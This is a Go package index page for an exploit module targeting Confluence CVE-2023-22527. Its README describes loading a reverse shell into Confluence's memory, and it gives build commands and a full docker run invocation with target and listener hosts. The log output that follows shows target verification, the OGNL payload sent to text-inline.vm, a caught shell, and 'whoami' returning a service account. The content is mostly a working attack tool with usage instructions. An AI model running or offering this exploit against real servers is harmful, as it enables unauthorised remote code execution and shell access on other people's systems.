reverseshell

command module

v0.0.0-...-1b4b94d Latest Latest Go to latest Published: Apr 17, 2024 License: Apache-2.0 Imports: 12 Imported by: 0

Details

Valid go.mod file

The Go module system was introduced in Go 1.11 and is the official dependency management solution for Go.
Redistributable license

Redistributable licenses place minimal restrictions on how software can be used, modified, and redistributed.
Tagged version

Modules with tagged versions give importers more predictable builds.
Stable version

When a project reaches major version v1 it is considered stable.
Learn more about best practices

Repository

github.com/vulncheck-oss/cve-2023-22527

Links

Open Source Insights

README ¶

In Memory Confluence Reverse Shell

This exploit will load a reverse shell into Confluence's memory. The reverse shell originates from a binary blob in go-exploit.

Compiling

To build a docker image:

make docker

If you have a Go build environment handy, you can also just use make:

albinolobster@mournland:~/cve-2023-22527/reverseshell$ make
gofmt -d -w cve-2023-22527.go 
golangci-lint run --fix cve-2023-22527.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-22527_linux-arm64 cve-2023-22527.go

Usage Example

albinolobster@mournland:~/cve-2023-22527/reverseshell$ sudo docker run -it --network=host reverseshell -a -v -c -e -rhost 10.9.49.76 -rport 8090 -lhost 10.9.49.75 -lport 1270
time=2024-03-05T16:42:45.895Z level=STATUS msg="Starting listener on 10.9.49.75:1270"
time=2024-03-05T16:42:45.895Z level=STATUS msg="Starting target" index=0 host=10.9.49.76 port=8090 ssl=false "ssl auto"=true
time=2024-03-05T16:42:45.906Z level=STATUS msg="Validating Confluence target" host=10.9.49.76 port=8090
time=2024-03-05T16:42:46.160Z level=SUCCESS msg="Target verification succeeded!" host=10.9.49.76 port=8090 verified=true
time=2024-03-05T16:42:46.160Z level=STATUS msg="Running a version check on the remote target" host=10.9.49.76 port=8090
time=2024-03-05T16:42:46.352Z level=VERSION msg="The self-reported version is: 8.5.3" host=10.9.49.76 port=8090 version=8.5.3
time=2024-03-05T16:42:46.352Z level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.76 port=8090 vulnerable=yes
time=2024-03-05T16:42:46.352Z level=STATUS msg="Sending OGNL expression size limit adjustment to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:42:46.587Z level=STATUS msg="Sending class CiXyUHob to http://10.9.49.76:8090/template/aui/text-inline.vm"
time=2024-03-05T16:42:46.624Z level=SUCCESS msg="Caught new shell from 10.9.49.76:51465"
time=2024-03-05T16:42:46.624Z level=STATUS msg="Active shell from 10.9.49.76:51465"
      
Microsoft Windows [Version 10.0.22000.2538]
(c) Microsoft Corporation. All rights reserved.

C:\Program Files\Atlassian\Confluence>
C:\Program Files\Atlassian\Confluence>whoami
whoami
nt authority\network service

Documentation ¶

There is no documentation for this package.

Source Files ¶

View all Source files

cve-2023-22527.go

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL